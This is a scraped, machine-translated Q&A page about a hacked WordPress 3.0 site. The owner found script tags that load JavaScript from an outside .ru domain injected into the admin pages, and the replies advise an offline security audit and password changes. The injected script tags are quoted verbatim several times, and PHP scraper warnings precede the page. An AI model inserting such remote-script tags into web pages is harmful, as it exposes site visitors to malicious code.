Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/security/4.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Security WordPress3.0安全性?_Security_Wordpress - Fatal编程技术网

Security WordPress3.0安全性?

Security WordPress3.0安全性?,security,wordpress,Security,Wordpress,我有一个WordPress3.0的网站 我注意到/wp admin今天显示以下错误 警告:无法修改标题信息-标题已由第890行/www/sites/.com/files/html/wp includes/default constants.php:299)中的/www/sites/.com/files/html/wp includes/pluggable.php发送 我使用了IE的视图源。我找到了下面的代码 script type="text/javascript" src="http://re

我有一个WordPress3.0的网站

我注意到/wp admin今天显示以下错误

警告:无法修改标题信息-标题已由第890行/www/sites/.com/files/html/wp includes/default constants.php:299)中的/www/sites/.com/files/html/wp includes/pluggable.php发送

我使用了IE的视图源。我找到了下面的代码

script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b-->
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><br />
scripttype=“text/javascript”src=”http://recordsquare.ru/KVM_Switch.js">

看起来我的网站被黑客入侵了

我只启用了cforms插件


有什么想法或建议吗?

让服务器离线,然后对其和任何可以上传内容的客户端运行安全审计。然后更改所有密码。

找到被黑客攻击的模块/表/文件并将其删除。Dorward//感谢您的建议。所以..这可能不是由WP或WP插件引起的?WordPress 3.0.1已退出,可能是安全更新(我没有检查),所以可能是漏洞。我对CFForms一无所知。可能是服务器上存在一些不相关的漏洞。可能是客户端上的恶意软件嗅探到ftp密码。这就是安全审计的要点。3.0.1不是一个安全版本。